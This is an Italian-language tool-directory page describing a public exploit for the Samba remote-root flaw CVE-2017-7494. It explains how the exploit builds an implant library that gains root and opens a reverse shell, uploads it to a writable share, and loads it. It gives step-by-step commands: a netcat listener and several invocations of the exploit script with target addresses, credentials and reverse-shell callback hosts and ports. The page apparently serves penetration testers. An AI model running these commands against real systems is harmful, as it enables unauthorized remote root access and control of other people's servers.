Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-7494 | Kitploit
Strumenti/GitHubGitHub/sudlit/cve-2017-7494
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingStrumento di Accesso Remoto
GitHubsudlit/cve-2017-7494

CVE-2017-7494

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-7494

Exploit root remoto per la vulnerabilità SAMBA CVE-2017-7494.

Dettagli

Questo exploit è diviso in 2 parti:

  • Primo, compila un payload chiamato "implant.c" e genera una libreria (libimplantx32.so o libimplantx64.so) che passa all'utente root, si scollega dal processo padre e apre una reverse shell.
  • Secondo, individua una condivisione scrivibile nell'host target specificato, carica la libreria con un nome casuale e prova a caricarla.

Finché il target è vulnerabile e il payload è corretto per il sistema operativo e l'architettura del target, l'exploit è affidabile al 100%.

Come fare

Sulla tua macchina, esegui il seguente comando:

root@kitploit:~
$ nc -p 31337 -l

Poi, esegui l'exploit contro il tuo target e attendi che si ricolleghi al tuo Netcat:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Se chiudi troppo in fretta la reverse shell, invece di eseguire di nuovo l'exploit che carica il modulo, ecc... puoi semplicemente passare il percorso del modulo che ha già caricato. Supponendo che sia stato caricato in /shared/directory/ come "module.so", eseguirai un comando come il seguente:

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

AGGIORNAMENTO 11/25/2017 - Archivaldo

Ora puoi eseguire di nuovo l'exploit contro Samba 3.5.0 e 3.6.0, devi solo aggiungere l'argomento -o 1

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Ora puoi usare il tuo .so personalizzato

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Nel caso tu debba eseguire questo script da una macchina x86, la compilazione dei binari implant creerà due file x86. Usando il flag -n 1 puoi disabilitare la compilazione e copiare libimplantx64.so da un'altra macchina.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Nel caso in cui Samba giri solo sulla porta 139. Puoi impostare la porta del server remoto usando l'argomento -p

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

NOTE

Non lo supporto più.

-- Joxean Koret

Scarica lo strumento